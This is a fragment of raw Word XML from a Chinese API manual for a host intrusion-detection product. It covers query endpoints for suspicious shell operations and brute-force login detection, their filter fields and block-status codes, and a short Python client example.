        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D52C321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B14AAD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52EB02D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD92BA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65F0181E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036A8E43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E05A43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EF37F7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6E3B91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>审核状态，1:未审核 2:审核通过 3:审核未通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46DA2D36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B054330" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#入侵检测-可疑操作-查询结果接口调用的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shelllog_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/detect/shelllog/linux?page=0&amp;size=50&amp;groups=1,2" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page': 0, 'size': 50, 'groups': '1,2'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF68B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="_Toc115166208"/>
      <w:bookmarkStart w:id="268" w:name="暴力破解"/>
      <w:bookmarkEnd w:id="264"/>
      <w:bookmarkEnd w:id="266"/>
      <w:r>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w14:paraId="22914458" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="_Toc115166209"/>
      <w:bookmarkStart w:id="270" w:name="查询结果-2"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w14:paraId="39F7B438" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9906C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutecrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B67565"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331"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="954"/>
        <w:gridCol w:w="6524"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C20019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3C28EC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59EBBE55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F1A782" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28B3FDE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08F0156E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EA2865" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C1C6E0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29B6CDE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6504EC74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26C46664" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D72D707" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39B01EFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34A14B57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD41F60" w14:textId="7DDD010F" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>攻击时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D6E3F0C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5798CCDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serviceType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BF81F84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18DDCDA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1026D962" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">服务类型， Linux: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>1:SSHD</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2:VSFTPD Windows: 100:RDP 101:WINRM 102:SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C52DDD2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49757CE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B45D069" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="005916DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74CE6057" w14:textId="227E8E91" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停状态，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "暴力破解封停状态" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>暴力破解封</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>停状态</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="064F7334" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02149F07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C258BEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77763919" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D796CCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>攻击来源</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7562E6E8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310341FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65079EA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705DCC99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597EED4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>攻击目标（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D135F88" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E41521B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AF7D184" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702D8A98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E2ADAAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B44D1F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>封</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>停状态</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="423"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="150663F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A3746B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759FF852" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C3C24BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3134DBA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DBA455" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0288C0FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A59B0DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE2D816" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B84BEDC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535FE965" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2189B8D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1898B8E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E9AE4F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="474E0EC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>手动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F998878" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35F9ADD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="468ECE9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>手动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="794E5ABB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70155435" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D4C75C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>解封中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C3B3DA9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DFBAE3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B587988" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="274F7921" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B93B69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0828FBC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>停失败</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
